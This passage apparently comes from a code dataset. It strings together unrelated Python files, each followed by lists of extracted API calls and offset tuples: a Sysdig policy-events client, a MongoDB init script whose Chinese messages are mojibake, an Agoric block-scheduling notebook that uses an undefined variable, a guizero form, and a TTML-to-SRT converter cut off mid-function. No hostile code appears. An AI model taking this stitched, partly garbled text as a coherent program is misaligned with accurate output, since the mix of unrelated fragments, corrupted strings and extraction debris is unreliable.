computed_distances['skewness_distance'])
|
[
"numpy.testing.assert_almost_equal",
"numpy.allclose"
] |
[((584, 656), 'numpy.allclose', 'np.allclose', (['self.tester.kurtosis_hist[1]', "computed_data['kurtosis_val']"], {}), "(self.tester.kurtosis_hist[1], computed_data['kurtosis_val'])\n", (595, 656), True, 'import numpy as np\n'), ((699, 771), 'numpy.allclose', 'np.allclose', (['self.tester.skewness_hist[1]', "computed_data['skewness_val']"], {}), "(self.tester.skewness_hist[1], computed_data['skewness_val'])\n", (710, 771), True, 'import numpy as np\n'), ((1057, 1161), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['self.tester_dist.kurtosis_distance', "computed_distances['kurtosis_distance']"], {}), "(self.tester_dist.kurtosis_distance,\n computed_distances['kurtosis_distance'])\n", (1080, 1161), True, 'import numpy.testing as npt\n'), ((1198, 1302), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['self.tester_dist.skewness_distance', "computed_distances['skewness_distance']"], {}), "(self.tester_dist.skewness_distance,\n computed_distances['skewness_distance'])\n", (1221, 1302), True, 'import numpy.testing as npt\n')]
|
import datetime
import requests
from sdcclient._common import _SdcCommon
class PolicyEventsClientV1(_SdcCommon):
def __init__(self, token="", sdc_url='https://secure.sysdig.com', ssl_verify=True, custom_headers=None):
super(PolicyEventsClientV1, self).__init__(token, sdc_url, ssl_verify, custom_headers)
self.customer_id = None
self.product = "SDS"
self._policy_v2 = None
def _get_policy_events_int(self, ctx):
limit = ctx.get("limit", 50)
policy_events_url = self.url + '/api/v1/secureEvents?limit={limit}{frm}{to}{filter}{cursor}'.format(
limit=limit,
frm=f"&from={int(ctx['from']):d}" if "from" in ctx else "",
to=f"&to={int(ctx['to']):d}" if "to" in ctx else "",
filter=f'&filter={ctx["filter"]}' if "filter" in ctx else "",
cursor=f'&cursor={ctx["cursor"]}' if "cursor" in ctx else "")
res = requests.get(policy_events_url, headers=self.hdrs, verify=self.ssl_verify)
if not self._checkResponse(res):
return [False, self.lasterr]
ctx = {
"limit": limit,
"cursor": res.json()["page"].get("prev", None)
}
return [True, {"ctx": ctx, "data": res.json()["data"]}]
def get_policy_events_range(self, from_sec, to_sec, filter=None):
'''**Description**
Fetch all policy events that occurred in the time range [from_sec:to_sec]. This method is used in conjunction
with :func:`~sdcclient.SdSecureClient.get_more_policy_events` to provide paginated access to policy events.
**Arguments**
- from_sec: the start of the timerange for which to get events
- end_sec: the end of the timerange for which to get events
- filter: this is a SysdigMonitor-like filter (e.g. filter: 'severity in ("4","5") and freeText in ("Suspicious")')
**Success Return Value**
An array containing:
- A context object that should be passed to later calls to get_more_policy_events.
- An array of policy events, in JSON format. See :func:`~sdcclient.SdSecureClient.get_more_policy_events`
for details on the contents of policy events.
**Example**
`examples/get_secure_policy_events.py <https://github.com/draios/python-sdc-client/blob/master/examples/get_secure_policy_events.py>`_
'''
options = {"from": int(from_sec) * 1_000_000_000,
"to": int(to_sec) * 1_000_000_000,
"limit": 50,
"filter": filter}
ctx = {k: v for k, v in options.items() if v is not None}
return self._get_policy_events_int(ctx)
def get_policy_events_duration(self, duration_sec, filter=None):
'''**Description**
Fetch all policy events that occurred in the last duration_sec seconds. This method is used in conjunction with
:func:`~sdcclient.SdSecureClient.get_more_policy_events` to provide paginated access to policy events.
**Arguments**
- duration_sec: Fetch all policy events that have occurred in the last *duration_sec* seconds.
- filter: this is a SysdigMonitor-like filter (e.g. filter: 'severity in ("4","5") and freeText in ("Suspicious")')
**Success Return Value**
An array containing:
- A context object that should be passed to later calls to get_more_policy_events.
- An array of policy events, in JSON format. See :func:`~sdcclient.SdSecureClient.get_more_policy_events`
for details on the contents of policy events.
**Example**
`examples/get_secure_policy_events.py <https://github.com/draios/python-sdc-client/blob/master/examples/get_secure_policy_events.py>`_
'''
to_sec = int((datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds())
from_sec = to_sec - (int(duration_sec))
return self.get_policy_events_range(from_sec, to_sec, filter)
def get_more_policy_events(self, ctx):
'''**Description**
Fetch additional policy events after an initial call to :func:`~sdcclient.SdSecureClient.get_policy_events_range` /
:func:`~sdcclient.SdSecureClient.get_policy_events_duration` or a prior call to get_more_policy_events.
**Arguments**
- ctx: a context object returned from an initial call to :func:`~sdcclient.SdSecureClient.get_policy_events_range` /
:func:`~sdcclient.SdSecureClient.get_policy_events_duration` or a prior call to get_more_policy_events.
**Success Return Value**
An array containing:
- A context object that should be passed to later calls to get_more_policy_events()
- An array of policy events, in JSON format. Each policy event contains the following:
- id: a unique identifier for this policy event
- cursor: unique ID that can be used with get_more_policy_events context to retrieve paginated policy events
- timestamp: when the event occurred (ns since the epoch)
- source: the source of the policy event. It can be "syscall" or "k8s_audit"
- description: the description of the event
- severity: a severity level from 1-7
- agentId: the agent that reported this event
- machineId: the MAC of the machine that reported this event
- content: More information about what triggered the event
- falsePositive: if the event is considered a false-positive
- fields: raw information from the rule that fired this event
- output: Output from the rule that fired this event
- policyId: the ID of the policy that fired this event
- ruleName: name of the rule that fired this event
- ruleTags: tags from the rule that fired this event
- labels: more information from the scope of this event
When the number of policy events returned is 0, there are no remaining events and you can stop calling get_more_policy_events().
**Example**
`examples/get_secure_policy_events.py <https://github.com/draios/python-sdc-client/blob/master/examples/get_secure_policy_events.py>`_
'''
return self._get_policy_events_int(ctx)
|
[
"datetime.datetime.utcnow",
"datetime.datetime.utcfromtimestamp",
"requests.get"
] |
[((929, 1003), 'requests.get', 'requests.get', (['policy_events_url'], {'headers': 'self.hdrs', 'verify': 'self.ssl_verify'}), '(policy_events_url, headers=self.hdrs, verify=self.ssl_verify)\n', (941, 1003), False, 'import requests\n'), ((3868, 3894), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3892, 3894), False, 'import datetime\n'), ((3897, 3934), 'datetime.datetime.utcfromtimestamp', 'datetime.datetime.utcfromtimestamp', (['(0)'], {}), '(0)\n', (3931, 3934), False, 'import datetime\n')]
|
import click
from motor.motor_asyncio import AsyncIOMotorClient
from pymongo.errors import CollectionInvalid
from app import settings
from scripts.utils import coro
async def create_collection(db: AsyncIOMotorClient, collection_name: str):
"""ๅๅปบ่กจ."""
try:
await db[settings.MONGO_DB].create_collection(collection_name)
except CollectionInvalid as e:
click.echo(e)
else:
click.echo(f"ๅๅปบ{collection_name}ๆๅ\n")
@click.command("initdb")
@coro
async def init_db():
"""ๅๅงๅๆฐๆฎๅบ."""
if click.confirm("ๅๅงๅๆฐๆฎๅบๅฏ่ฝไผๅฏผ่ดๅๆฐๆฎไธขๅคฑ๏ผ็กฎ่ฎค่ฆ็ปง็ปญๅ๏ผ"):
client = AsyncIOMotorClient(settings.db.url)
await create_collection(client, settings.db.collections.user)
await create_collection(client, settings.db.collections.order)
await client[settings.MONGO_DB][settings.db.collections.order].create_index(
"entrust_id"
)
await create_collection(client, settings.db.collections.position)
await client[settings.MONGO_DB][settings.db.collections.position].create_index(
"user"
)
await client[settings.MONGO_DB][settings.db.collections.position].create_index(
"symbol"
)
await client[settings.MONGO_DB][settings.db.collections.position].create_index(
"exchange"
)
await create_collection(client, settings.db.collections.user_assets_record)
await create_collection(client, settings.db.collections.statement)
click.echo("ๅๅงๅๆฐๆฎๅบๅฎๆ.")
else:
click.echo("ๅๅงๅๆฐๆฎๅบๅคฑ่ดฅ๏ผ็จๆทๆไฝไธญๆญข.")
|
[
"click.confirm",
"click.echo",
"motor.motor_asyncio.AsyncIOMotorClient",
"click.command"
] |
[((455, 478), 'click.command', 'click.command', (['"""initdb"""'], {}), "('initdb')\n", (468, 478), False, 'import click\n'), ((531, 572), 'click.confirm', 'click.confirm', (['"""ๅๅงๅๆฐๆฎๅบๅฏ่ฝไผๅฏผ่ดๅๆฐๆฎไธขๅคฑ๏ผ็กฎ่ฎค่ฆ็ปง็ปญๅ๏ผ"""'], {}), "('ๅๅงๅๆฐๆฎๅบๅฏ่ฝไผๅฏผ่ดๅๆฐๆฎไธขๅคฑ๏ผ็กฎ่ฎค่ฆ็ปง็ปญๅ๏ผ')\n", (544, 572), False, 'import click\n'), ((413, 451), 'click.echo', 'click.echo', (['f"""ๅๅปบ{collection_name}ๆๅ\n"""'], {}), "(f'ๅๅปบ{collection_name}ๆๅ\\n')\n", (423, 451), False, 'import click\n'), ((591, 626), 'motor.motor_asyncio.AsyncIOMotorClient', 'AsyncIOMotorClient', (['settings.db.url'], {}), '(settings.db.url)\n', (609, 626), False, 'from motor.motor_asyncio import AsyncIOMotorClient\n'), ((1486, 1509), 'click.echo', 'click.echo', (['"""ๅๅงๅๆฐๆฎๅบๅฎๆ."""'], {}), "('ๅๅงๅๆฐๆฎๅบๅฎๆ.')\n", (1496, 1509), False, 'import click\n'), ((1528, 1558), 'click.echo', 'click.echo', (['"""ๅๅงๅๆฐๆฎๅบๅคฑ่ดฅ๏ผ็จๆทๆไฝไธญๆญข."""'], {}), "('ๅๅงๅๆฐๆฎๅบๅคฑ่ดฅ๏ผ็จๆทๆไฝไธญๆญข.')\n", (1538, 1558), False, 'import click\n'), ((381, 394), 'click.echo', 'click.echo', (['e'], {}), '(e)\n', (391, 394), False, 'import click\n')]
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.11.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Block Scheduling Policy Simulation
#
# context: [build model of computron\-to\-wallclock relationship ยท Issue \#3459 ยท Agoric/agoric\-sdk](https://github.com/Agoric/agoric-sdk/issues/3459)
# ## Preface: PyData
import pandas as pd
import numpy as np
dict(pandas=pd.__version__,
numpy=np.__version__)
# ## MySql Access
TOP = __name__ == '__main__'
# +
import logging
from sys import stderr
logging.basicConfig(level=logging.INFO, stream=stderr,
format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
log = logging.getLogger(__name__)
if TOP:
log.info('notebook start')
# +
from slogdata import mysql_socket, show_times
def _slog4db(database='slog4'):
from sqlalchemy import create_engine
return create_engine(mysql_socket(database, create_engine))
_db4 = _slog4db()
_db4.execute('show tables').fetchall()
# -
# ## Global compute results for agorictest-16
#
# Based on one validator, **Provalidator**.
show_times(pd.read_sql('''
select *
from slog_run
where parent = 'Provalidator'
limit 10
''', _db4), ['time_lo', 'time_hi', 'blockTime_lo', 'blockTime_hi']).iloc[0]
# +
# _db4.execute('''drop table if exists delivery_compute_16''');
# +
def build_consensus_compute(theValidator, db,
table='delivery_compute_16'):
"""We include duration from 1 validator as well.
"""
log.info('creating %s', table)
db.execute(f'''
create table if not exists {table} as
with slog1 as (
select file_id
from file_info
where parent = %(theValidator)s
)
select blockHeight, blockTime, crankNum, vatID, deliveryNum, compute, dur
from j_delivery r
cross join slog1
where r.file_id = slog1.file_id
order by crankNum
''', dict(theValidator=theValidator))
agg = pd.read_sql(f'select count(*) from {table}', db)
log.info('done:\n%s', agg)
return pd.read_sql(f'select * from {table} limit 5', db)
build_consensus_compute('Provalidator', _db4)
# -
_dc16 = pd.read_sql('select * from delivery_compute_16 order by crankNum', _db4, index_col='crankNum')
_dc16.tail()
# `crankNum` goes from 31 to 34; 32 and 33 are missing. Perhaps `create-vat` cranks?
# +
def simulate_run_policy(df, threshold=8e6):
# does 10e6 help with bank update latency?
# only a little: max ~50 rather than ~70
meter = 0
# t_in = t_out = df.blockTime[0]
block_in = block_out = df.blockHeight.values[0]
for crankNum, d in df.iterrows():
if d.blockHeight > block_in:
block_in = d.blockHeight
if block_in > block_out:
block_out = block_in
meter = 0
yield block_out # do the work
meter += d.compute
if meter > threshold:
meter = 0
block_out += 1
df = _dc16[_dc16.blockHeight > _dc16.blockHeight.min()]
_sim16 = df.assign(bkSim=list(simulate_run_policy(df)))
_sim16
# -
_sim16[_sim16.bkSim < _sim16.blockHeight]
# +
def sim_aux_stats(df):
df = _sim16
original = df.groupby('blockHeight')
df = original.apply(lambda g: g.assign(
computeInBlock=g.compute.cumsum(),
durationInBlock=g.dur.cumsum()))
df = df.reset_index(level=0, drop=True)
simulated = df.groupby('bkSim')
df = simulated.apply(lambda g: g.assign(
computeInSimBlk=g.compute.cumsum(),
durationInSimBlk=g.dur.cumsum()))
df = df.reset_index(level=0, drop=True)
return df
df = sim_aux_stats(_sim16)
# -
df[['vatID', 'deliveryNum',
'blockHeight',
'compute', 'computeInBlock', 'computeInSimBlk']].describe()
df[['computeInBlock', 'computeInSimBlk']].plot(figsize=(12, 4));
df[['vatID', 'deliveryNum',
'blockHeight',
'dur', 'durationInBlock', 'durationInSimBlk']].describe()
df[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 6));
# ## Computrons go 3.7x faster early in agorictest-16
sim_lo = df[(df.index >= 20000) & (df.index <= 70000)]
sim_lo = sim_lo.reset_index().set_index(['blockHeight', 'crankNum'])
sim_lo = sim_lo.assign(rate=sim_lo.compute / sim_lo.dur)
sim_lo[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4));
sim_lo[['compute', 'computeInBlock', 'computeInSimBlk',
'dur','durationInBlock', 'durationInSimBlk', 'rate']].describe()
sim_hi = df[df.index >= 250000]
sim_hi = sim_hi.reset_index().set_index(['blockHeight', 'crankNum'])
sim_hi = sim_hi.assign(rate=sim_hi.compute / sim_hi.dur)
sim_hi[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4));
sim_hi[['compute', 'computeInBlock', 'computeInSimBlk',
'dur','durationInBlock', 'durationInSimBlk', 'rate']].describe()
# +
rate_lo_median = 1.738564e+06
rate_hi_median = 4.711452e+05
round(rate_lo_median / rate_hi_median, 1)
# -
# ## Latency
df['delay'] = df.bkSim - df.blockHeight
df[['delay']].describe()
df[['durationInBlock', 'durationInSimBlk', 'delay']].plot(figsize=(12, 4))
df.sort_values('delay', ascending=False).head(50)
# ## Zoom in on the X axis
103200 and 105500
# +
_zoom = df.loc[103200:105500]
_zoom = _zoom.reset_index().set_index(['blockHeight', 'crankNum'])
_zoom[['computeInBlock', 'computeInSimBlk']].plot(figsize=(12, 4), rot=-75);
# -
x = _zoom.reset_index()
g = x.groupby('bkSim')
x = pd.concat([
g[['blockHeight']].min(),
g[['compute']].sum(),
g[['dur']].sum()
])
x = x.assign(delay=x.index - x.blockHeight)
x
x[['compute', 'dur', 'delay']].plot(subplots=True, figsize=(15, 9))
_zoom[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4), rot=-75);
(df.bkSim - df.blockHeight).describe()
(df.bkSim - df.blockHeight).hist(figsize=(10, 5), bins=72, log=True)
# ## Elapsed time* on the X axis
#
# *estimated as cumulative crank duration
_zoom = df.loc[103273:104400].copy()
# _zoom = df
_zoom['t'] = _zoom.dur.cumsum()
_zoom.set_index('t')[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4), rot=-75);
# ### Detailed Data
_zoom.groupby('bkSim').apply(lambda g: g.head(10))[50:100][[
'dur', 't', 'durationInSimBlk', 'durationInBlock',
'compute', 'computeInSimBlk', 'computeInBlock',
'blockHeight', 'delay'
]]
df.loc[103200:105500][['delay']].plot()
x = pd.read_sql('''
select *
from j_delivery
where crankNum between 103200 and 105500
and file_id = 3288529541296525
''', _db4)
x
show_times(x[x.index.isin([x.index.min(), x.index.max()])])[['crankNum', 'blockHeight', 'blockTime']]
x.blockHeight.max() - x.blockHeight.min()
x.blockHeight.describe()
x[x.compute > 1000000].groupby('method')[['compute', 'dur']].aggregate(['count', 'median', 'mean'])
x = pd.read_sql('''
select *
from t_delivery
where method = 'fromBridge'
and blockHeight between 68817 and 69707
and file_id = 3288529541296525
''', _db4)
x
_db4.execute('''
create index if not exists slog_entry_bk_ix on slog_entry(blockHeight)
''');
_db4.execute('drop index if exists slog_entry_ty_ix on slog_entry');
# +
def bank_trace(db,
limit=250,
file_id=3288529541296525,
bk_lo=68817,
bk_hi=69707):
df = pd.read_sql(
'''
with d as (
select file_id, run_line_lo
, line
, blockHeight
, blockTime
, time
, crankNum
, cast(substr(json_unquote(json_extract(record, '$.vatID')), 2) as int) vatID
, coalesce(cast(json_extract(record, '$.deliveryNum') as int), -1) deliveryNum
, json_extract(record, '$.kd') kd
from slog_entry e
where blockHeight between %(bk_lo)s and %(bk_hi)s
and file_id = %(file_id)s
and type = 'deliver'
limit %(limit)s
),
detail as (
select d.*
, json_unquote(json_extract(d.kd, '$[0]')) tag
, json_unquote(json_extract(d.kd, '$[1]')) target
, json_unquote(json_extract(d.kd, '$[2].method')) method
, json_length(json_unquote(json_extract(d.kd, '$[2].args.body')), '$[1].updated') updated
from d
)
select blockHeight, blockTime, crankNum, vatID, deliveryNum
, tag
, case when tag = 'message' then target else null end target
, method, updated
, time
-- validator-specific: file_id, run_line_lo, line, time
from detail
-- where method = 'fromBridge'
order by blockHeight, crankNum
''', db, params=dict(limit=limit, file_id=file_id, bk_lo=bk_lo, bk_hi=bk_hi))
return df
# x1 = bank_trace(_db4, bk_hi=68817 + 100)
# x2 = bank_trace(_db4, bk_lo=69707 - 100)
# x = pd.concat([x1, x2])
x = bank_trace(_db4, limit=1000)
show_times(x)
# -
x.updated.describe()
x1 = x[~x.updated.isnull()]
color = np.where(x1.vatID == 1, 'blue', 'red')
show_times(x1).plot.scatter(x='time', y='updated', color=color,
figsize=(10, 4), alpha=0.45,
title='Accounts Updated per delivery');
# +
import json
def notifer_traffic(df):
kd = df.record.apply(lambda txt: json.loads(txt)['kd'])
dt = kd.apply(lambda k: k[0])
method = kd.apply(lambda k: k[2].get('method') if k[0] == 'message' else None)
body = kd.apply(lambda k: k[2].get('args', {}).get('body') if k[0] == 'message' else None)
body = body.apply(lambda v: json.loads(v) if v else None)
updated = body.apply(lambda b: len(b[1].get('updated')) if b else None)
# time = pd.as_datetime(df.time.dt.time)
df = df.assign(dt=dt, method=method, body=body, updated=updated)
dur = df.time.diff()
return df.assign(dur=dur)
notifer_traffic(show_times(x2)).drop(columns=['file_id', 'run_line_lo', 'line', 'record', 'body'])
# -
show_times(x2)
x2.record[0]
len(x2.record[0])
# +
import json
r = json.loads(x2.record[0])
body = r['kd'][2]['args']['body']
x = json.loads(body)
# print(json.dumps(r, indent=2))
len(x[1]['updated'])
# -
x2.record[1]
x2.record[2]
|
[
"json.loads",
"logging.basicConfig",
"slogdata.show_times",
"numpy.where",
"pandas.read_sql",
"logging.getLogger",
"slogdata.mysql_socket"
] |
[((723, 860), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'stream': 'stderr', 'format': '"""%(asctime)s %(levelname)s: %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(level=logging.INFO, stream=stderr, format=\n '%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n", (742, 860), False, 'import logging\n'), ((883, 910), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (900, 910), False, 'import logging\n'), ((2341, 2439), 'pandas.read_sql', 'pd.read_sql', (['"""select * from delivery_compute_16 order by crankNum"""', '_db4'], {'index_col': '"""crankNum"""'}), "('select * from delivery_compute_16 order by crankNum', _db4,\n index_col='crankNum')\n", (2352, 2439), True, 'import pandas as pd\n'), ((6499, 6632), 'pandas.read_sql', 'pd.read_sql', (['"""\nselect *\nfrom j_delivery\nwhere crankNum between 103200 and 105500\nand file_id = 3288529541296525\n"""', '_db4'], {}), '(\n """\nselect *\nfrom j_delivery\nwhere crankNum between 103200 and 105500\nand file_id = 3288529541296525\n"""\n , _db4)\n', (6510, 6632), True, 'import pandas as pd\n'), ((6903, 7063), 'pandas.read_sql', 'pd.read_sql', (['"""\nselect *\nfrom t_delivery\nwhere method = \'fromBridge\'\nand blockHeight between 68817 and 69707\nand file_id = 3288529541296525\n"""', '_db4'], {}), '(\n """\nselect *\nfrom t_delivery\nwhere method = \'fromBridge\'\nand blockHeight between 68817 and 69707\nand file_id = 3288529541296525\n"""\n , _db4)\n', (6914, 7063), True, 'import pandas as pd\n'), ((8925, 8938), 'slogdata.show_times', 'show_times', (['x'], {}), '(x)\n', (8935, 8938), False, 'from slogdata import mysql_socket, show_times\n'), ((9002, 9040), 'numpy.where', 'np.where', (['(x1.vatID == 1)', '"""blue"""', '"""red"""'], {}), "(x1.vatID == 1, 'blue', 'red')\n", (9010, 9040), True, 'import numpy as np\n'), ((9997, 10011), 'slogdata.show_times', 'show_times', (['x2'], {}), '(x2)\n', (10007, 10011), False, 'from slogdata import mysql_socket, show_times\n'), ((10067, 10091), 'json.loads', 'json.loads', (['x2.record[0]'], {}), '(x2.record[0])\n', (10077, 10091), False, 'import json\n'), ((10130, 10146), 'json.loads', 'json.loads', (['body'], {}), '(body)\n', (10140, 10146), False, 'import json\n'), ((2140, 2188), 'pandas.read_sql', 'pd.read_sql', (['f"""select count(*) from {table}"""', 'db'], {}), "(f'select count(*) from {table}', db)\n", (2151, 2188), True, 'import pandas as pd\n'), ((2231, 2280), 'pandas.read_sql', 'pd.read_sql', (['f"""select * from {table} limit 5"""', 'db'], {}), "(f'select * from {table} limit 5', db)\n", (2242, 2280), True, 'import pandas as pd\n'), ((1100, 1137), 'slogdata.mysql_socket', 'mysql_socket', (['database', 'create_engine'], {}), '(database, create_engine)\n', (1112, 1137), False, 'from slogdata import mysql_socket, show_times\n'), ((1306, 1404), 'pandas.read_sql', 'pd.read_sql', (['"""\nselect *\nfrom slog_run\nwhere parent = \'Provalidator\'\nlimit 10\n"""', '_db4'], {}), '(\n """\nselect *\nfrom slog_run\nwhere parent = \'Provalidator\'\nlimit 10\n""", _db4\n )\n', (1317, 1404), True, 'import pandas as pd\n'), ((9041, 9055), 'slogdata.show_times', 'show_times', (['x1'], {}), '(x1)\n', (9051, 9055), False, 'from slogdata import mysql_socket, show_times\n'), ((9909, 9923), 'slogdata.show_times', 'show_times', (['x2'], {}), '(x2)\n', (9919, 9923), False, 'from slogdata import mysql_socket, show_times\n'), ((9350, 9365), 'json.loads', 'json.loads', (['txt'], {}), '(txt)\n', (9360, 9365), False, 'import json\n'), ((9617, 9630), 'json.loads', 'json.loads', (['v'], {}), '(v)\n', (9627, 9630), False, 'import json\n')]
|
from guizero import App, Text, TextBox, Combo, PushButton, Box
app = App()
Text(app, text="My form")
form = Box(app, width="fill", layout="grid")
form.border = True
Text(form, text="Title", grid=[0,0], align="right")
TextBox(form, grid=[1,0])
Text(form, text="Name", grid=[0,1], align="right")
TextBox(form, grid=[1,1])
Text(form, text="Age", grid=[0,2], align="right")
TextBox(form, grid=[1,2])
buttons = Box(app, width="fill", align="bottom")
PushButton(buttons, text="Ok", align="left")
PushButton(buttons, text="Cancel", align="left")
app.display()
|
[
"guizero.App",
"guizero.TextBox",
"guizero.PushButton",
"guizero.Box",
"guizero.Text"
] |
[((70, 75), 'guizero.App', 'App', ([], {}), '()\n', (73, 75), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((77, 102), 'guizero.Text', 'Text', (['app'], {'text': '"""My form"""'}), "(app, text='My form')\n", (81, 102), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((111, 148), 'guizero.Box', 'Box', (['app'], {'width': '"""fill"""', 'layout': '"""grid"""'}), "(app, width='fill', layout='grid')\n", (114, 148), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((169, 221), 'guizero.Text', 'Text', (['form'], {'text': '"""Title"""', 'grid': '[0, 0]', 'align': '"""right"""'}), "(form, text='Title', grid=[0, 0], align='right')\n", (173, 221), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((221, 247), 'guizero.TextBox', 'TextBox', (['form'], {'grid': '[1, 0]'}), '(form, grid=[1, 0])\n', (228, 247), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((248, 299), 'guizero.Text', 'Text', (['form'], {'text': '"""Name"""', 'grid': '[0, 1]', 'align': '"""right"""'}), "(form, text='Name', grid=[0, 1], align='right')\n", (252, 299), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((299, 325), 'guizero.TextBox', 'TextBox', (['form'], {'grid': '[1, 1]'}), '(form, grid=[1, 1])\n', (306, 325), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((326, 376), 'guizero.Text', 'Text', (['form'], {'text': '"""Age"""', 'grid': '[0, 2]', 'align': '"""right"""'}), "(form, text='Age', grid=[0, 2], align='right')\n", (330, 376), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((376, 402), 'guizero.TextBox', 'TextBox', (['form'], {'grid': '[1, 2]'}), '(form, grid=[1, 2])\n', (383, 402), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((413, 451), 'guizero.Box', 'Box', (['app'], {'width': '"""fill"""', 'align': '"""bottom"""'}), "(app, width='fill', align='bottom')\n", (416, 451), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((453, 497), 'guizero.PushButton', 'PushButton', (['buttons'], {'text': '"""Ok"""', 'align': '"""left"""'}), "(buttons, text='Ok', align='left')\n", (463, 497), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((498, 546), 'guizero.PushButton', 'PushButton', (['buttons'], {'text': '"""Cancel"""', 'align': '"""left"""'}), "(buttons, text='Cancel', align='left')\n", (508, 546), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2017 <NAME>
# See https://github.com/codingcatgirl/ttml2srt
#
# MIT License
#
# Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import io
from datetime import timedelta
from defusedxml import ElementTree as ET
def ttml2srt( infile, outfile ):
tree = ET.parse( infile )
root = tree.getroot()
# strip namespaces
for elem in root.getiterator():
elem.tag = elem.tag.split('}', 1)[-1]
elem.attrib = {name.split('}', 1)
[-1]: value for name, value in elem.attrib.items()}
# get styles
styles = {}
for elem in root.findall('./head/styling/style'):
style = {}
if 'color' in elem.attrib:
color = elem.attrib['color']
if color not in ('#FFFFFF', '#000000'):
style['color'] = color
if 'fontStyle' in elem.attrib:
fontstyle = elem.attrib['fontStyle']
if fontstyle in ('italic', ):
style['fontstyle'] = fontstyle
styles[elem.attrib['id']] = style
body = root.find('./body')
# parse correct start and end times
def parse_time_expression(expression, default_offset=timedelta(0)):
offset_time = re.match(r'^([0-9]+(\.[0-9]+)?)(h|m|s|ms|f|t)$', expression)
if offset_time:
time_value, _, metric = offset_time.groups()
time_value = float(time_value)
if metric == 'h':
return default_offset + timedelta(hours=time_value)
elif metric == 'm':
return default_offset + timedelta(minutes=time_value)
elif metric == 's':
return default_offset + timedelta(seconds=time_value)
elif metric == 'ms':
return default_offset + timedelta(milliseconds=time_value)
elif metric == 'f':
raise NotImplementedError(
'Parsing time expressions by frame is not supported!')
elif metric == 't':
raise NotImplementedError(
'Parsing time expressions by ticks is not supported!')
clock_time = re.match(
r'^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\.[0-9]+)?)$', expression)
if clock_time:
hours, minutes, seconds, _ = clock_time.groups()
return timedelta(hours=int(hours), minutes=int(minutes), seconds=float(seconds))
clock_time_frames = re.match(
r'^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\.[0-9]+)?)$', expression)
if clock_time_frames:
raise NotImplementedError(
'Parsing time expressions by frame is not supported!')
raise ValueError('unknown time expression: %s' % expression)
def parse_times(elem, default_begin=timedelta(0)):
if 'begin' in elem.attrib:
begin = parse_time_expression(
elem.attrib['begin'], default_offset=default_begin)
else:
begin = default_begin
elem.attrib['{abs}begin'] = begin
end = None
if 'end' in elem.attrib:
end = parse_time_expression(
elem.attrib['end'], default_offset=default_begin)
dur = None
if 'dur' in elem.attrib:
dur = parse_time_expression(elem.attrib['dur'])
if dur is not None:
if end is None:
end = begin + dur
else:
end = min(end, begin + dur)
elem.attrib['{abs}end'] = end
for child in elem:
parse_times(child, default_begin=begin)
parse_times(body)
timestamps = set()
for elem in body.findall('.//*[@{abs}begin]'):
timestamps.add(elem.attrib['{abs}begin'])
for elem in body.findall('.//*[@{abs}end]'):
timestamps.add(elem.attrib['{abs}end'])
timestamps.discard(None)
# render subtitles on each timestamp
def render_subtitles(elem, timestamp, parent_style=None):
if timestamp < elem.attrib['{abs}begin']:
return ''
if elem.attrib['{abs}end'] is not None and timestamp >= elem.attrib['{abs}end']:
return ''
result = ''
style = parent_style.copy() if parent_style is not None else {}
if 'style' in elem.attrib:
style.update(styles[elem.attrib['style']])
if 'color' in style:
result += '<font color="%s">' % style['color']
if style.get('fontstyle') == 'italic':
result += '<i>'
if elem.text:
result += elem.text.strip()
if len(elem):
for child in elem:
result += render_subtitles(child, timestamp)
if child.tail:
